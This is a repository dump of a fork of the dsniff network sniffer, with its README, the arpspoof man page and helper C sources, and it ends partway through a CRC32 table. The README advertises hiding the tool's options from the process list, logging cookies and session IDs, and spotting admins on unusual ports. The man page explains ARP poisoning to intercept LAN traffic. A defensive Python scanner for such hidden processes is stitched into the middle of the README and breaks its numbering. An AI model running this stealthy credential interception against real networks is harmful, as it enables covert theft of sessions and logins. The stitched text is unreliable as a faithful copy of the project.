├── .github └── workflows │ └── static-release-push.yml ├── .gitignore ├── CHANGES ├── LICENSE ├── Makefile.in ├── README ├── README.md ├── TODO ├── acconfig.h ├── arp.c ├── arp.h ├── arpspoof.8 ├── arpspoof.c ├── asn1.c ├── asn1.h ├── base64.c ├── base64.h ├── buf.c ├── buf.h ├── config.h.in ├── configure ├── configure.ac ├── crc32.c ├── crc32.h ├── debian ├── README.Debian ├── README.source ├── changelog ├── control ├── copyright ├── docs ├── gbp.conf ├── patches │ ├── 01_time.h.patch │ ├── 02_mailsnarf_corrupt.patch │ ├── 03_pcap_read_dump.patch │ ├── 04_multiple_intf.patch │ ├── 05_amd64_fix.patch │ ├── 06_urlsnarf_zeropad.patch │ ├── 07_libnet_1.1.patch │ ├── 08_openssl-0.9.8.patch │ ├── 09_sysconf_clocks.patch │ ├── 10_urlsnarf_escape.patch │ ├── 11_string_header.patch │ ├── 12_arpa_inet_header.patch │ ├── 13_pop_with_version.patch │ ├── 14_obsolete_time.patch │ ├── 15_checksum_libnids.patch │ ├── 16_TDS_decoder.patch │ ├── 17_checksum.patch │ ├── 18_sshcrypto.patch │ ├── 19_rewrite-and-modernize-POP-decoder.patch │ ├── 20_debian_dirs.patch │ ├── 21_msgsnarf_segfault.patch │ ├── 22_handlepp.patch │ ├── 23_urlsnarf_timestamp.patch │ ├── 24_Fix-OpenSSL1.1.0-Build.patch │ ├── 25_fix-spelling-errors.patch │ ├── 26_arpspoof-add-r-switch-to-poison-both-directions.patch │ ├── 27_arpspoof-allow-use-of-of-multiple-targets.patch │ ├── 28_arpspoof-allow-selection-of-source-hw-address.patch │ ├── 29_libnet_name2addr4.patch │ ├── 30_pntohl_shift.patch │ ├── 31_sysconf_clocks.patch │ ├── 32_rpc_segfault.patch │ ├── 33_sshcrypto_DES.patch │ ├── 34_fix-parallel-FTBFS.patch │ ├── 35_Add_CPPFLAGS.patch │ ├── 36_implicit_declarations.patch │ ├── 37_fix-lib-and-share-dirs.patch │ ├── 38_fix-pcap_init.patch │ ├── 39_libtirpc.patch │ └── series ├── rules ├── salsa-ci.yml ├── source │ └── format └── watch ├── decode.c ├── decode.h ├── decode_aim.c ├── decode_citrix.c ├── decode_cvs.c ├── decode_ftp.c ├── decode_hex.c ├── decode_http.c ├── decode_icq.c ├── decode_imap.c ├── 
decode_irc.c ├── decode_ldap.c ├── decode_mmxp.c ├── decode_mountd.c ├── decode_napster.c ├── decode_nntp.c ├── decode_oracle.c ├── decode_ospf.c ├── decode_pcanywhere.c ├── decode_pop.c ├── decode_portmap.c ├── decode_postgresql.c ├── decode_pptp.c ├── decode_rip.c ├── decode_rlogin.c ├── decode_smb.c ├── decode_smtp.c ├── decode_sni.c ├── decode_sniffer.c ├── decode_snmp.c ├── decode_socks.c ├── decode_ssh.c ├── decode_tds.c ├── decode_telnet.c ├── decode_vrrp.c ├── decode_x11.c ├── decode_yp.c ├── dnsspoof.8 ├── dnsspoof.c ├── dnsspoof.hosts ├── dsniff.8 ├── dsniff.c ├── dsniff.magic ├── dsniff.services ├── dsniff_magic.h ├── dsniff_services.h ├── env2argv.c ├── env2argv.h ├── filesnarf.8 ├── filesnarf.c ├── hex.c ├── hex.h ├── install-sh ├── macof.8 ├── macof.c ├── magic.c ├── magic.h ├── mailsnarf.8 ├── mailsnarf.c ├── missing ├── dirname.c ├── dummy.c ├── err.c ├── err.h ├── ethers.c ├── libgen.h ├── md5.c ├── md5.h ├── memcmp.c ├── strlcat.c ├── strlcat.h ├── strlcpy.c ├── strlcpy.h ├── strsep.c └── sys │ └── queue.h ├── mount.c ├── mount.h ├── mount.x ├── msgsnarf.8 ├── msgsnarf.c ├── nfs_prot.c ├── nfs_prot.h ├── nfs_prot.x ├── options.h ├── pathnames.h ├── pcaputil.c ├── pcaputil.h ├── record.c ├── record.h ├── remote.c ├── rpc.c ├── rpc.h ├── ssh.c ├── ssh.h ├── sshcrypto.c ├── sshcrypto.h ├── sshmitm.8 ├── sshmitm.c ├── sshow.8 ├── sshow.c ├── tcp_raw.c ├── tcp_raw.h ├── tcpkill.8 ├── tcpkill.c ├── tcpnice.8 ├── tcpnice.c ├── trigger.c ├── trigger.h ├── urlsnarf.8 ├── urlsnarf.c ├── vroot.h ├── webmitm.8 ├── webmitm.c ├── webspy.8 └── webspy.c /.gitignore: -------------------------------------------------------------------------------- 1 | dsniff-*.tar.gz 2 | dsniff-*/ 3 | info.txt 4 | **/.DS_Store 5 | Makefile 6 | config.* 7 | *.a 8 | *.cache 9 | *.dat 10 | dsniff 11 | arpspoof 12 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 
1 | 2 | Copyright (c) 1999, 2000 Dug Song 3 | All rights reserved, all wrongs reversed. 4 | 5 | Redistribution and use in source and binary forms, with or without 6 | modification, are permitted provided that the following conditions 7 | are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright 10 | notice, this list of conditions and the following disclaimer. 11 | 2. Redistributions in binary form must reproduce the above copyright 12 | notice, this list of conditions and the following disclaimer in the 13 | documentation and/or other materials provided with the distribution. 14 | 3. The name of author may not be used to endorse or promote products 15 | derived from this software without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 18 | INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 19 | AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 20 | THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 23 | OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 24 | WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 26 | ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Resurrection and enhancements of [Dug Song's](https://en.wikipedia.org/wiki/W00w00) all-time-classic network sniffer: 2 | 3 | * Hides the command line options (`ENV_ARGS=`) from the process list (`ps`). 4 | * Show Banners (`-v`). 5 | * HTTP parsing improvements & Cookie logging. 
6 | * No duplicates: Reports each result only once. 7 | * Stand-alone & static binary (no need for dsniff.magic/dsniff.services) 8 | * Deep-Packet-Inspection (`-m`). Port agnostic. 9 | 10 | 11 | Download the [Pre Compiled Static Binary](https://github.com/hackerschoice/dsniff/releases/latest) for Linux, FreeBSD and OpenBSD. 12 | 13 | ```sh 14 | curl -SsfL "https://github.com/hackerschoice/dsniff/releases/latest/download/dsniff_linux-$(uname -m)" -o dsniff 15 | ``` 16 | 17 | Run (example): 18 | ```sh 19 | export ENV_ARGS="-i eth0 -v -m not port 443" # hide options from the process list 20 | ./dsniff 21 | ``` 22 | 23 | The reason why I prefer dsniff over most others: 24 | 1. The results give a quick overview who/where SSL/SSH is being used. 25 | 1. It logs Cookies and Session IDs. 26 | 1. It shows plaintext HTTP `Location: ` redirects to HTTPS. 27 | 1. It shows WireGuard or SSH on non-default ports (like port 31337). Those tend to be worthy admins. 28 | 29 | ![dsniff-thc-screenshot](https://github.com/hackerschoice/dsniff/assets/5938498/d3eeb16c-dd64-41f6-b839-ca7a70e34778) 30 | 31 | Compile: 32 | ```sh 33 | ./configure --enable static && make dsniff 34 | ``` 35 | 36 | ### Useful parameters: 37 | `-C` - Force Color [default is to show color on TTY only] 38 | `-P` - Use promisc mode 39 | `-v` - Show banners (SNI, SSH, HTTP, Cookies, ...) 40 | `-m` - Detect protocol regardless of the port (e.g ssh on port 222 etc). 
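`ENV_ARGS` keeps the options out of the argument vector that `ps` prints, but on Linux the variable is still readable in `/proc/<pid>/environ` by root and by the process owner. The following is an added example, not code from this repository: it flags processes that carry `ENV_ARGS` and correlates them with open packet sockets listed in `/proc/net/packet`, which a libpcap capture on Linux holds. It assumes the process has not overwritten its own environment block; the function names and the sample data are constructed for illustration.

```python
# Added example, not dsniff code. Linux only; reading other users' /proc needs root.
import os
import re

ENV_KEY = "ENV_ARGS"  # variable name taken from the README
SOCK_LINK = re.compile(r"^socket:\[(\d+)\]$")

def parse_environ(blob):
    """Split a NUL-separated /proc/<pid>/environ blob into a dict."""
    env = {}
    for entry in blob.split(b"\0"):
        name, sep, value = entry.partition(b"=")
        if name and sep:
            env[name.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env

def parse_cmdline(blob):
    """Split a NUL-separated /proc/<pid>/cmdline blob into argv."""
    if not blob:
        return []  # kernel threads have an empty cmdline
    return [a.decode("utf-8", "replace") for a in blob.rstrip(b"\0").split(b"\0")]

def packet_socket_inodes(proc_net_packet):
    """Return the Inode column (last field) of each row of /proc/net/packet."""
    inodes = set()
    for line in proc_net_packet.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if fields and fields[-1].isdigit():
            inodes.add(int(fields[-1]))
    return inodes

def socket_inodes(fd_links):
    """Extract inode numbers from readlink() targets of /proc/<pid>/fd/*."""
    matches = (SOCK_LINK.match(link) for link in fd_links)
    return {int(m.group(1)) for m in matches if m}

def assess(pid, environ_blob, cmdline_blob, fd_links, packet_inodes):
    """Return a finding when options are carried in ENV_ARGS, else None."""
    env = parse_environ(environ_blob)
    if ENV_KEY not in env:
        return None
    argv = parse_cmdline(cmdline_blob)
    return {
        "pid": pid,
        "argv": argv,
        "env_args": env[ENV_KEY],
        "bare_argv": len(argv) <= 1,  # nothing but argv[0] visible in ps
        "packet_socket": bool(socket_inodes(fd_links) & packet_inodes),
    }

def read_fd_links(fd_dir):
    """Resolve every descriptor symlink in /proc/<pid>/fd."""
    links = []
    for fd in os.listdir(fd_dir):
        try:
            links.append(os.readlink(os.path.join(fd_dir, fd)))
        except OSError:
            continue  # descriptor closed while we were looking
    return links

def scan(proc="/proc"):
    """Walk a live /proc; processes we cannot read are skipped."""
    try:
        with open(os.path.join(proc, "net", "packet")) as fh:
            pkt = packet_socket_inodes(fh.read())
    except OSError:
        pkt = set()
    findings = []
    for name in filter(str.isdigit, os.listdir(proc)):
        base = os.path.join(proc, name)
        try:
            with open(os.path.join(base, "environ"), "rb") as fh:
                environ = fh.read()
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                cmdline = fh.read()
            links = read_fd_links(os.path.join(base, "fd"))
        except OSError:
            continue  # exited, or not ours to read
        hit = assess(int(name), environ, cmdline, links, pkt)
        if hit:
            findings.append(hit)
    return findings

# Constructed sample data (not captured from a real host).
SAMPLE_ENVIRON = b"PATH=/usr/bin\0ENV_ARGS=-i eth0 -v -m not port 443\0HOME=/root\0"
SAMPLE_CMDLINE = b"./dsniff\0"
SAMPLE_FD_LINKS = ["/dev/pts/0", "socket:[48213]", "pipe:[5120]"]
SAMPLE_NET_PACKET = (
    "sk       RefCnt Type Proto  Iface R Rmem   User   Inode\n"
    "ffff8881045f2000 3      3    0003   2     1 0      0      48213\n"
)

if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

A finding with `bare_argv` and `packet_socket` both true is the combination worth triaging first; `ENV_ARGS` alone only shows that the variable is set.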
41 | 42 | Compare [original](https://packages.debian.org/source/unstable/dsniff): [Diff](https://github.com/hackerschoice/dsniff/compare/orig...main) 43 | Original [README](README) 44 | 45 | --- 46 | Similar tools: 47 | * https://github.com/lgandx/PCredz 48 | * https://github.com/DanMcInerney/net-creds 49 | 50 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | $Id: TODO,v 1.2 2000/12/02 06:29:30 dugsong Exp $ 2 | 3 | - finish conversion to buf interface 4 | 5 | - rework half-duplex tcp_raw reassembly, for *snarf [-c] 6 | 7 | - NTLM handling in telnet, FTP, HTTP, SMB, NNTP, etc. non-trivial 8 | since dsniff only examines client traffic :-/ 9 | 10 | - arpspoof [host ...] 11 | 12 | - more protocols: atalk, MAPI, etc.? 13 | 14 | - reverse more of AOL's OSCAR protocol for dsniff and msgsnarf 15 | 16 | -------------------------------------------------------------------------------- /acconfig.h: -------------------------------------------------------------------------------- 1 | /* Define to 'uint32_t' if doesn't define. */ 2 | #undef u_int32_t 3 | 4 | /* Define to 'uint64_t' if doesn't define. */ 5 | #undef u_int64_t 6 | 7 | /* Define to 'u_int32_t' if doesn't define. */ 8 | #undef in_addr_t 9 | 10 | /* Define if you have the header file. */ 11 | #undef HAVE_DB_H 12 | 13 | /* Define if you have the header file. */ 14 | #undef HAVE_DB_185_H 15 | 16 | /* Should be in , *sigh* */ 17 | #undef HAVE_MINMAX 18 | #ifndef HAVE_MINMAX 19 | #define MIN(a,b) (((a)<(b))?(a):(b)) 20 | #define MAX(a,b) (((a)>(b))?(a):(b)) 21 | #endif 22 | 23 | -------------------------------------------------------------------------------- /arp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * arp.c 3 | * 4 | * ARP cache routines. 
5 | * 6 | * Copyright (c) 1999 Dug Song 7 | * 8 | * $Id: arp.c,v 1.8 2001/03/15 08:32:58 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | #ifdef BSD 17 | #include 18 | #include 19 | #include 20 | #ifdef __FreeBSD__ /* XXX */ 21 | #define ether_addr_octet octet 22 | #endif 23 | #else /* !BSD */ 24 | #include 25 | #ifndef __linux__ 26 | #include 27 | #endif 28 | #endif /* !BSD */ 29 | #include 30 | #include 31 | #include 32 | #include 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | 39 | #include "arp.h" 40 | 41 | #ifdef BSD 42 | int 43 | arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf) 44 | { 45 | int mib[6]; 46 | size_t len; 47 | char *buf, *next, *end; 48 | struct rt_msghdr *rtm; 49 | struct sockaddr_inarp *sin; 50 | struct sockaddr_dl *sdl; 51 | 52 | mib[0] = CTL_NET; 53 | mib[1] = AF_ROUTE; 54 | mib[2] = 0; 55 | mib[3] = AF_INET; 56 | mib[4] = NET_RT_FLAGS; 57 | mib[5] = RTF_LLINFO; 58 | 59 | if (sysctl(mib, 6, NULL, &len, NULL, 0) < 0) 60 | return (-1); 61 | 62 | if ((buf = (char *)malloc(len)) == NULL) 63 | return (-1); 64 | 65 | if (sysctl(mib, 6, buf, &len, NULL, 0) < 0) { 66 | free(buf); 67 | return (-1); 68 | } 69 | end = buf + len; 70 | 71 | for (next = buf ; next < end ; next += rtm->rtm_msglen) { 72 | rtm = (struct rt_msghdr *)next; 73 | sin = (struct sockaddr_inarp *)(rtm + 1); 74 | sdl = (struct sockaddr_dl *)(sin + 1); 75 | 76 | if (sin->sin_addr.s_addr == ip && sdl->sdl_alen) { 77 | memcpy(ether->ether_addr_octet, LLADDR(sdl), 78 | ETHER_ADDR_LEN); 79 | free(buf); 80 | return (0); 81 | } 82 | } 83 | free(buf); 84 | 85 | return (-1); 86 | } 87 | 88 | #else /* !BSD */ 89 | 90 | #ifndef ETHER_ADDR_LEN /* XXX - Solaris */ 91 | #define ETHER_ADDR_LEN 6 92 | #endif 93 | 94 | int 95 | arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* lif) 96 | { 97 | int sock; 98 | struct arpreq ar; 99 | struct sockaddr_in *sin; 100 | 101 | memset((char 
*)&ar, 0, sizeof(ar)); 102 | #ifdef __linux__ 103 | strncpy(ar.arp_dev, lif, sizeof(ar.arp_dev) - 1); /* ar is zeroed above, so the name stays NUL-terminated */ 104 | #endif 105 | sin = (struct sockaddr_in *)&ar.arp_pa; 106 | sin->sin_family = AF_INET; 107 | sin->sin_addr.s_addr = ip; 108 | 109 | if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { 110 | return (-1); 111 | } 112 | if (ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1) { 113 | close(sock); 114 | return (-1); 115 | } 116 | close(sock); 117 | memcpy(ether->ether_addr_octet, ar.arp_ha.sa_data, ETHER_ADDR_LEN); 118 | 119 | return (0); 120 | } 121 | 122 | #endif /* !BSD */ 123 | -------------------------------------------------------------------------------- /arp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * arp.h 3 | * 4 | * ARP cache routines. 5 | * 6 | * Copyright (c) 1999 Dug Song 7 | * 8 | * $Id: arp.h,v 1.1 2001/03/15 08:27:08 dugsong Exp $ 9 | */ 10 | 11 | #ifndef _ARP_H_ 12 | #define _ARP_H_ 13 | 14 | int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf); 15 | 16 | #endif /* _ARP_H_ */ 17 | -------------------------------------------------------------------------------- /arpspoof.8: -------------------------------------------------------------------------------- 1 | .TH ARPSPOOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | arpspoof 6 | \- 7 | intercept packets on a switched LAN 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBarpspoof\fR [\fB\-i \fIinterface\fR] [\fB\-c \fIown|host|both\fR] [\fB\-t \fItarget\fR] [\fB\-r\fR] \fIhost\fR 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBarpspoof\fR redirects packets from a target host (or all hosts) 17 | on the LAN intended for another host on the LAN by forging ARP 18 | replies. This is an extremely effective way of sniffing traffic on a 19 | switch. 20 | .LP 21 | Kernel IP forwarding (or a userland program which accomplishes the 22 | same, e.g. fragrouter(8)) must be turned on ahead of time. 
23 | .SH OPTIONS 24 | .IP "\fB-i \fIinterface\fR" 25 | Specify the interface to use. 26 | .IP "\fB-c \fIown|host|both\fR" 27 | Specify which hardware address to use when restoring the arp configuration; 28 | while cleaning up, packets can be sent with the own address as well as with 29 | the address of the host. Sending packets with a fake hw address can disrupt 30 | connectivity with certain switch/ap/bridge configurations, however it works 31 | more reliably than using the own address, which is the default way arpspoof 32 | cleans up afterwards. 33 | .IP "\fB-t \fItarget\fR" 34 | Specify a particular host to ARP poison (if not specified, all hosts 35 | on the LAN). Repeat to specify multiple hosts. 36 | .IP "\fB\-r\fR" 37 | Poison both hosts (host and target) to capture traffic in both directions. 38 | (only valid in conjunction with \-t) 39 | .IP \fIhost\fR 40 | Specify the host you wish to intercept packets for (usually the local 41 | gateway). 42 | .SH "SEE ALSO" 43 | dsniff(8), fragrouter(8) 44 | .SH AUTHOR 45 | .na 46 | .nf 47 | Dug Song 48 | -------------------------------------------------------------------------------- /asn1.c: -------------------------------------------------------------------------------- 1 | /* 2 | * asn1.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: asn1.c,v 1.4 2001/03/15 08:32:58 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | 14 | #include 15 | 16 | #include "buf.h" 17 | #include "asn1.h" 18 | 19 | int 20 | asn1_type(buf_t buf) 21 | { 22 | u_char c; 23 | 24 | if (buf_get(buf, &c, 1) != 1) 25 | return (-1); 26 | 27 | return (c & 0x1f); 28 | } 29 | 30 | int 31 | asn1_len(buf_t buf) 32 | { 33 | u_char *p, c; 34 | int num; 35 | 36 | if (buf_get(buf, &c, 1) != 1) 37 | return (-1); 38 | 39 | if (c >= 128) { 40 | c &= ~128; 41 | p = buf_ptr(buf); 42 | 43 | if (buf_skip(buf, c) < 0) 44 | return (-1); 45 | 46 | switch (c) { 47 | case 1: 48 | num = *p; 49 | break; 50 | case 2: 51 | 
GETSHORT(num, p); 52 | break; 53 | case 3: 54 | p--; GETLONG(num, p); 55 | num &= 0xffffff; /* keep all three length octets, drop the prefix byte */ 56 | break; 57 | case 4: 58 | GETLONG(num, p); 59 | break; 60 | default: 61 | return (-1); 62 | } 63 | } 64 | else num = c; 65 | 66 | return (num); 67 | } 68 | -------------------------------------------------------------------------------- /asn1.h: -------------------------------------------------------------------------------- 1 | /* 2 | * asn1.h 3 | * 4 | * ASN.1 routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: asn1.h,v 1.3 2001/03/15 08:33:05 dugsong Exp $ 9 | */ 10 | 11 | #ifndef ASN1_H 12 | #define ASN1_H 13 | 14 | #define ASN1_INTEGER 2 15 | #define ASN1_STRING 4 16 | #define ASN1_SEQUENCE 16 17 | 18 | int asn1_type(buf_t buf); 19 | int asn1_len(buf_t buf); 20 | 21 | #endif /* ASN1_H */ 22 | 23 | -------------------------------------------------------------------------------- /base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * base64.h 3 | * 4 | * Base-64 routines. 5 | * 6 | * $Id: base64.h,v 1.2 2001/03/15 08:33:05 dugsong Exp $ 7 | */ 8 | 9 | #ifndef BASE64_H 10 | #define BASE64_H 11 | 12 | int base64_pton(char const *, u_char *, size_t); 13 | 14 | #endif /* BASE64_H */ 15 | 16 | -------------------------------------------------------------------------------- /buf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * buf.h 3 | * 4 | * Buffer manipulation routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: buf.h,v 1.6 2001/03/15 08:33:05 dugsong Exp $ 9 | */ 10 | 11 | #ifndef BUF_H 12 | #define BUF_H 13 | 14 | typedef struct buf { 15 | u_char *base; 16 | int size; 17 | int offset; 18 | int end; 19 | } *buf_t; 20 | 21 | /* Initialize buffer. */ 22 | void buf_init(buf_t buf, u_char *data, int len); 23 | 24 | /* Allocate buffer. */ 25 | buf_t buf_new(int size); 26 | 27 | /* Free buffer. 
*/ 28 | void buf_free(buf_t buf); 29 | 30 | /* Return pointer to buffer data. */ 31 | #define buf_ptr(b) ((b)->base + (b)->offset) 32 | 33 | /* Return length of buffer data. */ 34 | #define buf_len(b) ((b)->end - (b)->offset) 35 | 36 | /* Return remaining length of unused buffer. */ 37 | #define buf_left(b) ((b)->size - (b)->offset) 38 | 39 | /* Return size of buffer. */ 40 | #define buf_size(b) ((b)->size) 41 | 42 | /* Return offset in buffer. */ 43 | #define buf_tell(b) ((b)->offset) 44 | 45 | /* Reposition buffer offset. */ 46 | int buf_seek(buf_t buf, int offset, int whence); 47 | #define buf_skip(b, l) buf_seek(b, l, SEEK_CUR) 48 | #define buf_rewind(b) buf_seek(b, 0, SEEK_SET) 49 | 50 | /* Read from buffer. */ 51 | int buf_get(buf_t buf, void *dst, int len); 52 | 53 | /* Write to buffer. */ 54 | int buf_put(buf_t buf, void *src, int len); 55 | int buf_putf(buf_t buf, const char *fmt, ...); 56 | 57 | /* Finalize buffer. */ 58 | void buf_end(buf_t buf); 59 | 60 | /* Locate byte string in buffer. */ 61 | int buf_index(buf_t buf, void *ptr, int len); 62 | int buf_rindex(buf_t buf, void *ptr, int len); 63 | 64 | /* Compare buffer to byte string. */ 65 | int buf_cmp(buf_t buf, void *ptr, int len); 66 | 67 | /* Tokenize buffer, like strtok(3). */ 68 | buf_t buf_tok(buf_t buf, void *sep, int len); 69 | 70 | /* Get a sub-buffer from buffer. */ 71 | buf_t buf_getbuf(buf_t buf, int offset, int len); 72 | 73 | /* Get a word from buffer. */ 74 | buf_t buf_getword(buf_t buf, void *sep, int len); 75 | 76 | /* Convert buffer to allocated string. */ 77 | char * buf_strdup(buf_t buf); 78 | 79 | /* ASCII string test. */ 80 | int buf_isascii(buf_t buf); 81 | 82 | #endif /* BUF_H */ 83 | -------------------------------------------------------------------------------- /config.h.in: -------------------------------------------------------------------------------- 1 | /* config.h.in. Generated automatically from configure.in by autoheader. 
*/ 2 | 3 | /* Define to empty if the keyword does not work. */ 4 | #undef const 5 | 6 | /* Define if you have the strftime function. */ 7 | #undef HAVE_STRFTIME 8 | 9 | /* Define as the return type of signal handlers (int or void). */ 10 | #undef RETSIGTYPE 11 | 12 | /* Define to `unsigned' if doesn't define. */ 13 | #undef size_t 14 | 15 | /* Define if you have the ANSI C header files. */ 16 | #undef STDC_HEADERS 17 | 18 | /* Define if your declares struct tm. */ 19 | #undef TM_IN_SYS_TIME 20 | 21 | /* Define if the X Window System is missing or not being used. */ 22 | #undef X_DISPLAY_MISSING 23 | 24 | /* Define to 'uint32_t' if doesn't define. */ 25 | #undef u_int32_t 26 | 27 | /* Define to 'uint64_t' if doesn't define. */ 28 | #undef u_int64_t 29 | 30 | /* Define to 'u_int32_t' if doesn't define. */ 31 | #undef in_addr_t 32 | 33 | /* Define if you have the header file. */ 34 | #undef HAVE_DB_H 35 | 36 | /* Define if you have the header file. */ 37 | #undef HAVE_DB_185_H 38 | 39 | /* Should be in , *sigh* */ 40 | #undef HAVE_MINMAX 41 | #ifndef HAVE_MINMAX 42 | #define MIN(a,b) (((a)<(b))?(a):(b)) 43 | #define MAX(a,b) (((a)>(b))?(a):(b)) 44 | #endif 45 | 46 | /* Define if you have the MD5Update function. */ 47 | #undef HAVE_MD5UPDATE 48 | 49 | /* Define if you have the dirname function. */ 50 | #undef HAVE_DIRNAME 51 | 52 | /* Define if you have the ether_ntoa function. */ 53 | #undef HAVE_ETHER_NTOA 54 | 55 | /* Define if you have the gethostname function. */ 56 | #undef HAVE_GETHOSTNAME 57 | 58 | /* Define if you have the socket function. */ 59 | #undef HAVE_SOCKET 60 | 61 | /* Define if you have the strdup function. */ 62 | #undef HAVE_STRDUP 63 | 64 | /* Define if you have the strlcat function. */ 65 | #undef HAVE_STRLCAT 66 | 67 | /* Define if you have the strlcpy function. */ 68 | #undef HAVE_STRLCPY 69 | 70 | /* Define if you have the strsep function. */ 71 | #undef HAVE_STRSEP 72 | 73 | /* Define if you have the strstr function. 
*/ 74 | #undef HAVE_STRSTR 75 | 76 | /* Define if you have the warnx function. */ 77 | #undef HAVE_WARNX 78 | 79 | /* Define if you have the header file. */ 80 | #undef HAVE_ERR_H 81 | 82 | /* Define if you have the header file. */ 83 | #undef HAVE_FCNTL_H 84 | 85 | /* Define if you have the header file. */ 86 | #undef HAVE_LIBGEN_H 87 | 88 | /* Define if you have the header file. */ 89 | #undef HAVE_NET_IF_TUN_H 90 | 91 | /* Define if you have the header file. */ 92 | #undef HAVE_SYS_IOCTL_H 93 | 94 | /* Define if you have the header file. */ 95 | #undef HAVE_SYS_QUEUE_H 96 | 97 | /* Define if you have the header file. */ 98 | #undef HAVE_UNISTD_H 99 | 100 | /* Define if you have the nsl library (-lnsl). */ 101 | #undef HAVE_LIBNSL 102 | 103 | /* Define if you have the resolv library (-lresolv). */ 104 | #undef HAVE_LIBRESOLV 105 | 106 | /* Define if you have the rpcsvc library (-lrpcsvc). */ 107 | #undef HAVE_LIBRPCSVC 108 | 109 | /* Define if you have the socket library (-lsocket). */ 110 | #undef HAVE_LIBSOCKET 111 | -------------------------------------------------------------------------------- /crc32.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include "crc32.h" 4 | 5 | /* 6 | * Table of CRCs of all 8-bit messages. 
7 | */ 8 | static const uint32_t CRC32_Table[256] = 9 | { 10 | 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 11 | 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 12 | 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 13 | 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 14 | 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 15 | 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 16 | 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 17 | 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 18 | 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 19 | 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 20 | 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 21 | 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 22 | 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 23 | 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 24 | 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 25 | 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 26 | 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 27 | 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 28 | 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 29 | 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 30 | 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 31 | 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 32 | 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 33 | 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 34 | 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 35 | 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 36 | 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 37 | 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 38 | 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 39 | 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 40 | 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 41 | 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 42 | 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 43 